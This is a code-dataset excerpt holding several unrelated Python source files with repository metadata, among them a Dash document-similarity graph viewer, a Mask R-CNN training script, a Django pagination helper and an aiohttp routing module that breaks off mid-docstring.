# We fetch all the records just for demo purpose.
next_token = ''
while True:
response = rs_data.get_statement_result(
Id=statement_id, NextToken=next_token)
results.append(response['Records'])
if 'NextToken' in response:
next_token = response['NextToken']
else:
break
time.sleep(0.5)
logger.info('results: %s', results)
return {
'NumRows': len(results),
}
| 22.875
| 53
| 0.625683
|
4a020c890edb1e9be6fe42ee28161d730a50f6cc
| 596
|
py
|
Python
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 37
|
2019-10-28T01:35:43.000Z
|
2022-03-31T04:11:49.000Z
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 61
|
2020-07-16T00:18:22.000Z
|
2022-03-24T07:12:05.000Z
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 10
|
2020-03-03T05:28:05.000Z
|
2022-02-14T10:03:44.000Z
|
from typing import List
from PuppeteerLibrary.library_context.ilibrary_context import iLibraryContext
from abc import ABC, abstractmethod
class iPuppeteerLibrary(ABC):
@abstractmethod
def get_current_library_context(self) -> iLibraryContext:
pass
@abstractmethod
def get_library_context_by_name(self, alias: str) -> iLibraryContext:
pass
@abstractmethod
def get_all_library_context(self) -> List[iLibraryContext]:
pass
@abstractmethod
def create_library_context(self,alias: str, browser_type: str) -> iLibraryContext:
pass
| 27.090909
| 86
| 0.739933
|
4a020c9c08821925abccc4949832565b5eb2ebbb
| 409
|
py
|
Python
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 1,110
|
2017-11-13T19:34:24.000Z
|
2022-03-29T09:14:56.000Z
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 768
|
2017-11-17T00:06:27.000Z
|
2022-03-31T20:20:09.000Z
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 281
|
2017-11-16T19:56:17.000Z
|
2022-03-28T06:25:33.000Z
|
import tensorflow as tf
from onnx_tf.handlers.backend_handler import BackendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import tf_func
from .math_mixin import BasicMathMixin
@onnx_op("Asin")
@tf_func(tf.asin)
class Asin(BasicMathMixin, BackendHandler):
@classmethod
def version_7(cls, node, **kwargs):
return [cls.make_tensor_from_onnx_node(node, **kwargs)]
| 25.5625
| 59
| 0.801956
|
4a020d257aefa4eb1aa4ce0ecd9698a53031039d
| 1,712
|
py
|
Python
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | 1
|
2021-01-29T17:53:58.000Z
|
2021-01-29T17:53:58.000Z
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | 1
|
2021-01-22T00:08:18.000Z
|
2021-01-22T00:09:23.000Z
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | null | null | null |
"""
********************************************************************************
studio2021
********************************************************************************
.. currentmodule:: studio2021
.. toctree::
:maxdepth: 1
"""
from __future__ import print_function
import os
import sys
__author__ = ["Tomas Mendez Echenagucia"]
__copyright__ = "Copyright 2020, Design Machine Group - University of Washington"
__license__ = "MIT License"
__email__ = "tmendeze@uw.edu"
__version__ = "0.1.0"
HERE = os.path.dirname(__file__)
HOME = os.path.abspath(os.path.join(HERE, "../../"))
DATA = os.path.abspath(os.path.join(HOME, "data"))
DOCS = os.path.abspath(os.path.join(HOME, "docs"))
TEMP = os.path.abspath(os.path.join(HOME, "temp"))
# Check if package is installed from git
# If that's the case, try to append the current head's hash to __version__
try:
git_head_file = compas._os.absjoin(HOME, '.git', 'HEAD')
if os.path.exists(git_head_file):
# git head file contains one line that looks like this:
# ref: refs/heads/master
with open(git_head_file, 'r') as git_head:
_, ref_path = git_head.read().strip().split(' ')
ref_path = ref_path.split('/')
git_head_refs_file = compas._os.absjoin(HOME, '.git', *ref_path)
if os.path.exists(git_head_refs_file):
with open(git_head_refs_file, 'r') as git_head_ref:
git_commit = git_head_ref.read().strip()
__version__ += '-' + git_commit[:8]
except Exception:
pass
__all__ = ["HOME", "DATA", "DOCS", "TEMP"]
def get(filename):
filename = filename.strip('/')
return os.path.abspath(os.path.join(DATA, filename))
| 27.612903
| 81
| 0.591706
|
4a020e7b7a3a24205383b39b04461eb5ad8848fc
| 6,677
|
py
|
Python
|
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | 2
|
2020-01-14T18:17:50.000Z
|
2021-06-10T21:02:46.000Z
|
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | null | null | null |
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | null | null | null |
import ctypes
import webbrowser
from threading import Thread
import dash
import dash_core_components as core
import dash_cytoscape as cyto
import dash_html_components as html
from drawing.CallbackProvider import CallbackProvider
from drawing.StylesheetProvider import StylesheetProvider
from utils.IOUtils import IOUtils
class GraphDrawer:
__MIN_EDGE_WEIGHT = 0.04
__EDGE_WEIGHT_PRECISION = 4
__MAX_NODE_NAME_LENGTH = 25
__DEFAULT_DROPDOWN_VALUE = '-1'
__DEFAULT_LAYOUT = 'circle'
similarity_arr: None
screen_size: None
demo_mode: bool
stylesheetProvider = StylesheetProvider()
def __init__(self, demo_mode: bool) -> None:
self.screen_size = self.__get_screen_size()
self.demo_mode = demo_mode
def draw(self, arr, filenames):
self.similarity_arr = arr
app = dash.Dash()
elements, nodes_per_id, full_filename_per_node_id = self.__get_elements_and_filename_dict(arr, filenames)
app.layout = html.Div([
html.Div(className='controls-container',
children=[
self.__get_label_view(),
self.__get_dropdown_with_view(),
self.__get_label_slider(),
self.__get_slider(),
self.__get_slider_value()
]),
html.Div(className='controls-container',
children=[
self.__get_dropdown_with_documents(full_filename_per_node_id),
self.__get_button_select_all()
]),
html.Div(id='pdf-and-cytoscape-container',
children=[
html.Div(id='pdf-viewer', children=[
html.Iframe(id='pdf-viewer-frame')
]),
self.__get_cytoscape(elements)
]),
html.P(id='cytoscape-tapNodeData-output'),
html.P(id='cytoscape-tapEdgeData-output'),
html.P(id='cytoscape-broker'),
])
callback_provider = CallbackProvider(self.__DEFAULT_DROPDOWN_VALUE, nodes_per_id)
callback_provider.define_callbacks(app)
# TODO Moving thread creation to method in Application.py
if self.demo_mode:
new = webbrowser.open_new('http://127.0.0.1:8050/')
app.run_server(debug=True)
else:
thread = Thread(target=app.run_server)
webbrowser.open_new('http://127.0.0.1:8050/')
thread.start()
def __get_cytoscape(self, elements):
return cyto.Cytoscape(
id='cytoscape-container',
elements=elements,
style={
'width': self.screen_size[0] - 300,
'height': self.screen_size[1]
},
layout={
'name': self.__DEFAULT_LAYOUT,
},
stylesheet=self.stylesheetProvider.get_stylesheet(self.__DEFAULT_LAYOUT),
maxZoom=10,
minZoom=0.5
)
@staticmethod
def __get_screen_size():
user32 = ctypes.windll.user32
return user32.GetSystemMetrics(0) - 100, user32.GetSystemMetrics(1) - 180
def __get_elements_and_filename_dict(self, arr, filenames):
elements = []
shortened_filenames = []
node_per_id = dict()
id_per_filename = dict()
full_filename_per_node_id = dict()
curr_id = 0
for filename in filenames:
shortened_filename = IOUtils.shorten_file_name(filename, self.__MAX_NODE_NAME_LENGTH)
shortened_filenames.append(shortened_filename)
full_filename_per_node_id[curr_id] = filename
id_per_filename[shortened_filename] = curr_id
node = {'data': {'id': curr_id, 'label': shortened_filename}}
elements.append(node)
node_per_id[curr_id] = node
curr_id += 1
for (i, row) in enumerate(range(1, len(arr))):
for col in range(0, i + 1):
rgb_val = int((1.0 - arr[row][col]) * 256)
rgb = 'rgb(' + str(rgb_val) + ',' + str(rgb_val) + ',' + str(rgb_val) + ')'
edge = {'data': {'source': id_per_filename.get(shortened_filenames[row]),
'target': id_per_filename.get(shortened_filenames[col]),
'label': arr[row][col],
'weight': self.__get_rounded_weight(arr[row][col]),
'size': 1,
'rgb': rgb
}}
elements.append(edge)
return elements, node_per_id, full_filename_per_node_id
@staticmethod
def __get_rounded_weight(num):
return round(num, 2)
@staticmethod
def __get_dropdown_with_view():
return core.Dropdown(
id='dropdown-view',
value='circle',
clearable=False,
options=[
{'label': name.capitalize(), 'value': name}
for name in ['grid', 'random', 'circle', 'cose', 'concentric']
]
)
def __get_dropdown_with_documents(self, filename_per_node_id):
return core.Dropdown(
id='dropdown-documents',
value=self.__DEFAULT_DROPDOWN_VALUE,
clearable=False,
options=[
{'label': name, 'value': id}
for id, name in filename_per_node_id.items()
]
)
@staticmethod
def __get_slider():
return core.Slider(
id='slider-similarity',
max=1,
min=0,
value=0,
step=0.02,
updatemode='drag',
marks={0: {'label': '0'},
0.2: {'label': '0.2'},
0.4: {'label': '0.4'},
0.6: {'label': '0.6'},
0.8: {'label': '0.8'},
1.0: {'label': '1.0'}
}
)
def __get_slider_value(self):
return html.Div(
id='slider-value'
)
def __get_button_select_all(self):
return html.Button(
'Select all',
id='button-select-all',
className='button'
)
def __get_label_view(self):
return html.Div(
className='label',
children='Select view type'
)
def __get_label_slider(self):
return html.Div(
id='label-slider',
className='label',
children='Adjust similarity'
)
| 33.552764
| 113
| 0.53527
|
4a020e9cfd602cba443e49d9da5f5c272cd24c24
| 375
|
py
|
Python
|
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
try:
# Change here if project is renamed and does not equal the package name
dist_name = 'non/flask_uploader'
__version__ = get_distribution(dist_name).version
except DistributionNotFound:
__version__ = 'unknown'
finally:
del get_distribution, DistributionNotFound
| 31.25
| 75
| 0.768
|
4a020fc3fc5d0f85631fb0a911c77caebcaafbd0
| 1,705
|
py
|
Python
|
model-optimizer/extensions/front/tf/Unpack.py
|
mypopydev/dldt
|
8cd639116b261adbbc8db860c09807c3be2cc2ca
|
[
"Apache-2.0"
] | 3
|
2019-07-08T09:03:03.000Z
|
2020-09-09T10:34:17.000Z
|
model-optimizer/extensions/front/tf/Unpack.py
|
openvino-pushbot/dldt
|
e607ee70212797cf9ca51dac5b7ac79f66a1c73f
|
[
"Apache-2.0"
] | 3
|
2020-11-13T18:59:18.000Z
|
2022-02-10T02:14:53.000Z
|
model-optimizer/extensions/front/tf/Unpack.py
|
openvino-pushbot/dldt
|
e607ee70212797cf9ca51dac5b7ac79f66a1c73f
|
[
"Apache-2.0"
] | 1
|
2018-12-14T07:56:02.000Z
|
2018-12-14T07:56:02.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
from mo.front.common.replacement import FrontReplacementOp
from mo.graph.graph import Node, insert_node_after
from mo.ops.squeeze import Squeeze
class Unpack(FrontReplacementOp):
"""
The Unpack from TF operation removes dimension over which the unpack is performed. The "Split" layer of IE doesn't
do that. This replacer adds squeeze operation for each output of the Unpack nodes to remove the dimension.
"""
op = "Unpack"
enabled = False
def nodes_to_remove(self, graph: nx.MultiDiGraph, match: dict):
# do not remove
return []
def replace_op(self, graph: nx.MultiDiGraph, node: Node):
# TODO FIXME incorrect output port assigment sporadically for the TF Faster RCNN network:
# SecondStagePostprocessor/Decode/get_center_coordinates_and_sizes/sub
for ind in range(len(node.out_nodes())):
squeeze_node = Squeeze(graph, dict(squeeze_dims=[node.axis], name=node.name + '/Squeeze_')).create_node([])
insert_node_after(node, squeeze_node, ind)
# do not replace any output edge
return []
| 37.888889
| 119
| 0.727859
|
4a020fdd79f0fc42c351f6da48ee0dcb7e1f228b
| 2,763
|
py
|
Python
|
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | 1
|
2020-08-17T06:24:56.000Z
|
2020-08-17T06:24:56.000Z
|
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | null | null | null |
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Django-common pagination module dramatically simplifies the pagination task.
You only have to do following things.
In view::
@render_to('foo_list.html')
def foo_list(request):
qs = Foo.objects.all()
page = paginate(qs, request)
return {'page': page,
}
In template::
<ul>
{% for item in page.object_list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% include "pagination.html" %}
If you want to know how this work under the hood please look at source code.
"""
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from common.templatetags.common_tags import alter_qs
def paginate(qs, request, per_page=15, frame_size=10):
"""
Return extended ``django.core.paginator.Page`` object
Args:
:qs: queryset which should be paginated
:request: django request object
:per_page: number of objects per page
:frame_size: number of visible pages (does not include first and large page)
"""
try:
page_number = int(request.GET.get('page', 1))
except ValueError:
page_number = 1
paginator = Paginator(qs, per_page)
try:
page = paginator.page(page_number)
except (EmptyPage, InvalidPage):
page_number = 1
page = paginator.page(1)
query_string = request.META['QUERY_STRING']
if page.has_previous():
page.previous_page_url = alter_qs(query_string, 'page', page.previous_page_number())
else:
page.previous_page_url = None
if page.has_next():
page.next_page_url = alter_qs(query_string, 'page', page.next_page_number())
else:
page.next_page_url = None
page.first_page_url = alter_qs(query_string, 'page', 1)
page.last_page_url = alter_qs(query_string, 'page', page.paginator.num_pages)
urls = []
if frame_size is None:
for x in page.paginator.page_range:
urls.append((x, alter_qs(query_string, 'page', x)))
start = 1
end = page.paginator.page_range
else:
half = int(frame_size / 2.0)
start = max(1, page.number - int(frame_size / 2.0))
stop = min(page.paginator.num_pages, start + frame_size - 1)
if stop == page.paginator.num_pages:
if stop - start < (frame_size - 1):
start = max(1, stop - frame_size)
if start == 1:
if stop - start < (frame_size - 1):
stop = min(page.paginator.num_pages, start + frame_size)
for x in xrange(start, stop + 1):
urls.append((x, alter_qs(query_string, 'page', x)))
page.paginator.frame = urls
page.paginator.frame_start_page = start
page.paginator.frame_end_page = stop
return page
| 29.084211
| 92
| 0.624683
|
4a0210015f46deaeb2db1ecfe7909f45dd994e3a
| 2,733
|
py
|
Python
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | 2
|
2015-06-09T16:07:09.000Z
|
2015-07-28T10:06:31.000Z
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | 3
|
2020-07-22T15:14:55.000Z
|
2021-12-13T19:35:06.000Z
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
__author__ = 'Brian McKenna'
from nose.plugins.attrib import attr
from unittest import SkipTest
from mock import Mock, patch, ANY
from pyon.util.int_test import IonIntegrationTestCase
from pyon.util.unit_test import IonUnitTestCase
from pyon.datastore.datastore_query import DatastoreQueryBuilder
from pyon.datastore.postgresql.pg_query import PostgresQueryBuilder
import interface.objects
@attr('UNIT', group='datastore')
class PostgresDataStoreUnitTest(IonUnitTestCase):
def test_wkt(self):
""" unit test to verify the DatastoreQuery to PostgresQuery to SQL translation for PostGIS WKT """
wkt = 'POINT(-72.0 40.0)'
buf = 0.1
# PostgresQueryBuilder - WKT (no buffer)
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.overlaps_geom(qb.RA_GEOM_LOC,wkt,0.0))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Intersects(geom_loc,ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'))")
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.contains_geom(qb.RA_GEOM_LOC,wkt,0.0))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Contains(geom_loc,ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'))")
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.within_geom(qb.RA_GEOM_LOC,wkt,0.0))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Within(geom_loc,ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'))")
# PostgresQueryBuilder - WKT (with buffer)
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.overlaps_geom(qb.RA_GEOM_LOC,wkt,buf))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Intersects(geom_loc,ST_Buffer(ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'), 0.100000))")
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.contains_geom(qb.RA_GEOM_LOC,wkt,buf))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Contains(geom_loc,ST_Buffer(ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'), 0.100000))")
qb = DatastoreQueryBuilder()
qb.build_query(where=qb.within_geom(qb.RA_GEOM_LOC,wkt,buf))
pqb = PostgresQueryBuilder(qb.get_query(), 'test')
self.assertEquals(pqb.get_query(),"SELECT id,doc FROM test WHERE ST_Within(geom_loc,ST_Buffer(ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'), 0.100000))")
| 47.947368
| 166
| 0.71094
|
4a0210a01c314590a57b744354b412470a071a82
| 6,911
|
py
|
Python
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 8
|
2019-03-22T19:48:33.000Z
|
2019-08-31T06:38:58.000Z
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 31
|
2018-10-25T09:33:13.000Z
|
2021-08-25T15:29:08.000Z
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 5
|
2018-11-02T19:52:47.000Z
|
2020-04-15T04:27:37.000Z
|
"""
Training module for maskrcnn on Bottles, Boxes and Candy bags.
"""
from config import *
import h5py
from imgaug import augmenters as iaa
from sklearn.model_selection import train_test_split
from random import randint
import numpy as np
import json
class ClomaskDataset(utils.Dataset):
"""
Class wrapper for clomask dataset.
"""
def load_shapes(self, id_list, train_path):
"""
Initialize the class with dataset info.
"""
with open(ROOT_DIR + 'id_map.json') as mapping_file:
class_mapping = (json.load(mapping_file))
# Add classes
for val in class_mapping.keys():
self.add_class('clomask', val, class_mapping[val])
# self.add_class('clomask', 2, "boxes")
# self.add_class('clomask', 3, "bags")
self.train_path = train_path
# Add images
for i, id_ in enumerate(id_list):
self.add_image('clomask', image_id=i, path=None,
img_name=id_)
def _load_img(self, fname):
"""
Reading image file from a path.
"""
img = cv2.imread(fname)
img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)
return img
def load_image(self, image_id, color):
"""
Load image from directory
"""
info = self.image_info[image_id]
path = self.train_path + info['img_name'] + \
IMAGE_PATH + info['img_name'] + '.png'
try:
img = self._load_img(path)
except:
path = self.train_path + info['img_name'] + \
IMAGE_PATH + info['img_name'] + '.jpg'
img = self._load_img(path)
return img
def image_reference(self, image_id):
"""
Return the images data of the image.
"""
info = self.image_info[image_id]
return info['path']
def load_mask(self, image_id):
"""
Generate instance masks for images of the given image ID.
"""
info = self.image_info[image_id]
path = self.train_path + info['img_name'] + \
MASK_PATH + info['img_name'] + '.h5'
if os.path.exists(path):
with h5py.File(path, "r") as hf:
mask = hf["mask_images"][()]
class_ids = hf["labels"][()]
else:
path = self.train_path + info['img_name']
mask = []
class_ids = []
for mask_file in next(os.walk(path + MASK_PATH))[2]:
if 'png' in mask_file:
# these lines have been commented out due to invalid test data file name
mask_ = cv2.imread(path + MASK_PATH + mask_file, 0)
mask_ = np.where(mask_ > 128, 1, 0)
# Add mask only if its area is larger than one pixel
if np.sum(mask_) >= 1:
mask.append(np.squeeze(mask_))
class_id = int(mask_file.split('$')[1][:-4])
class_ids.append(class_id)
mask = np.stack(mask, axis=-1)
return mask.astype(np.uint8), np.array(class_ids)
class ClomaskTrain(object):
"""
Training class for clomask dataset.
"""
def __init__(self):
self.init_weights = 'coco'
self.config = ClomaskConfig()
self.learning_rate_one = 1e-4
self.learning_rate_two = 1e-5
self.learning_rate_three = 1e-6
self.train_data = None
self.val_data = None
def prepare_dataset(self):
train_list, test_list = os.listdir(TRAIN_PATH), os.listdir(TEST_PATH)
#train_list, test_list = train_test_split(os.listdir(TRAIN_PATH), test_size=0.1,
# random_state=2019)
# Use this for explode the training data for use in augmentation.
# train_list = np.repeat(train_list,5)
# initialize training dataset
train_data = ClomaskDataset()
train_data.load_shapes(train_list, TRAIN_PATH)
train_data.prepare()
# initialize validation dataset
validation_data = ClomaskDataset()
validation_data.load_shapes(test_list, TEST_PATH)
#validation_data.load_shapes(test_list, TRAIN_PATH)
validation_data.prepare()
# Create model configuration in training mode
self.config.STEPS_PER_EPOCH = len(train_list)//self.config.BATCH_SIZE
self.config.VALIDATION_STEPS = len(test_list)//self.config.BATCH_SIZE
self.train_data = train_data
self.val_data = validation_data
def weight_initialize(self):
"""
Loading Model weights to start training with
"""
self.model = modellib.MaskRCNN(mode="training", config=self.config, model_dir=MODEL_DIR)
if self.init_weights == "imagenet":
weights_path = self.model.get_imagenet_weights()
self.model.load_weights(weights_path, by_name=True, exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif self.init_weights == "coco":
weights_path = COCO_PATH
self.model.load_weights(weights_path, by_name=True, exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
def model_train(self):
augmentation = iaa.Sequential([
iaa.Sometimes(0.5,iaa.Fliplr(0.5),iaa.Flipud(0.5)),
iaa.OneOf([iaa.Affine(rotate=0),
iaa.Affine(rotate=90),
iaa.Sometimes(0.5, iaa.Affine(rotate=(-20, 20)))])
#iaa.Sometimes(0.2, iaa.Affine(scale=randint(2, 3))),
])
# Start Training the model
# "mrcnn_mask"
# "mask_heads"
self.model.train(self.train_data, self.val_data,
learning_rate=self.learning_rate_one,
epochs=30,
layers='all',
augmentation=augmentation)
self.model.train(self.train_data, self.val_data,
learning_rate=self.learning_rate_two,
epochs=60,
layers='all',
augmentation=augmentation)
self.model.train(self.train_data, self.val_data,
learning_rate=self.learning_rate_three,
epochs=90,
layers='all',
augmentation=augmentation)
def main():
Clomasktrain = ClomaskTrain()
Clomasktrain.prepare_dataset()
Clomasktrain.weight_initialize()
Clomasktrain.model_train()
if __name__ == '__main__':
start = time.time()
main()
print('Elapsed time', round((time.time() - start)/60, 1), 'minutes')
| 35.994792
| 111
| 0.559687
|
4a0212828ab0cd6ffe2449048e5bb987dd07f6b2
| 7,979
|
py
|
Python
|
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/18 11:02
# @Author : Baijb
import asyncio
import functools
import inspect
import logging
import os
import re
from urllib import parse
from aiohttp import web
from www.apis import APIError
_RE_HANDLE_NAME = re.compile(r'^[0-9a-zA-Z_.]+handler$') # handel名称匹配规则
def get(path):
"""
定义装饰器 @get('/path'),将方法和路径的信息保存至__method__和__route__上
:param path:
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'GET'
wrapper.__route__ = path
return wrapper
return decorator
def post(path):
"""
定义装饰器 @post('/path'),将方法和路径的信息保存至__method__和__route__上
:param path:
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'POST'
wrapper.__route__ = path
return wrapper
return decorator
def get_required_kw_args(fn):
"""
获取函数中必填字段,关键字类型且默认值为空(Parameter.KEYWORD_ONLY 是跟在* 或*args参数后面的除收集关键字外的参数,调用时需要指定参数名)
:param fn:
:return:
"""
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:
args.append(name)
return tuple(args)
def get_named_kw_args(fn):
"""
获取关键字类型的参数,包含有默认值的参数
:param fn:
:return:
"""
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
args.append(name)
return tuple(args)
def has_named_kw_args(fn):
"""
判断是否有关键字类型的参数,包含有默认值的参数
:param fn:
:return:
"""
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
return True
def has_var_kw_arg(fn):
"""
判断是否有收集类关键字参数
:param fn:
:return:
"""
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.VAR_KEYWORD:
return True
def has_request_arg(fn):
"""
是否包含请求参数,且request后面跟的参数类型不能是
:param fn:
:return:
"""
sig = inspect.signature(fn)
params = sig.parameters
found = False
for name, param in params.items():
if name == 'request':
found = True
continue
if found and (param.kind != inspect.Parameter.VAR_POSITIONAL and param.kind != inspect.Parameter.KEYWORD_ONLY
and param.kind != inspect.Parameter.VAR_KEYWORD):
raise ValueError(
'request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
return found
class RequestHandler(object):
"""
封装调用函数,在调用前封装请求参数
"""
def __init__(self, app, fn):
self._app = app
self._func = fn
self._has_request_arg = has_request_arg(fn)
self._has_var_kw_arg = has_var_kw_arg(fn)
self._has_named_kw_args = has_named_kw_args(fn)
self._named_kw_args = get_named_kw_args(fn)
self._required_kw_args = get_required_kw_args(fn)
async def __call__(self, request):
"""
RequestHandler相当于装饰器用于调用前的请求参数封装
实现__call__方法可以使用 “实例(request)” 进行调用
:param request:
:return:
"""
kw = None
if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
if request.method == 'POST':
if not request.content_type:
return web.HTTPBadRequest('Missing Content-Type.')
ct = request.content_type.lower()
if ct.startswith('application/json'):
params = await request.json()
if not isinstance(params, dict):
return web.HTTPBadRequest('JSON body must be object.')
kw = params
elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
params = await request.post()
kw = dict(**params)
else:
return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
if request.method == 'GET':
qs = request.query_string
if qs:
kw = dict()
for k, v in parse.parse_qs(qs, True).items():
kw[k] = v[0]
if kw is None:
kw = dict(**request.match_info)
else:
if not self._has_var_kw_arg and self._named_kw_args:
# remove all unamed kw:
copy = dict()
for name in self._named_kw_args:
if name in kw:
copy[name] = kw[name]
kw = copy
# check named arg:
for k, v in request.match_info.items():
if k in kw:
logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
kw[k] = v
if self._has_request_arg:
kw['request'] = request
# check required kw:
if self._required_kw_args:
for name in self._required_kw_args:
if not name in kw:
return web.HTTPBadRequest('Missing argument: %s' % name)
logging.info('call with args: %s' % str(kw))
try:
r = await self._func(**kw)
return r
except APIError as e:
return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
"""
添加静态资源的读取路径,当前目录下的static文件夹(目前是写死静态资源的访问路径前缀和静态资源路径)
:param app:需要注册静态资源的服务器对象
:return:
"""
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
# url 前缀,folder路径
app.router.add_static('/static/', path)
logging.info('add static %s => %s' % ('/static/', path))
def add_route(app, fn):
"""
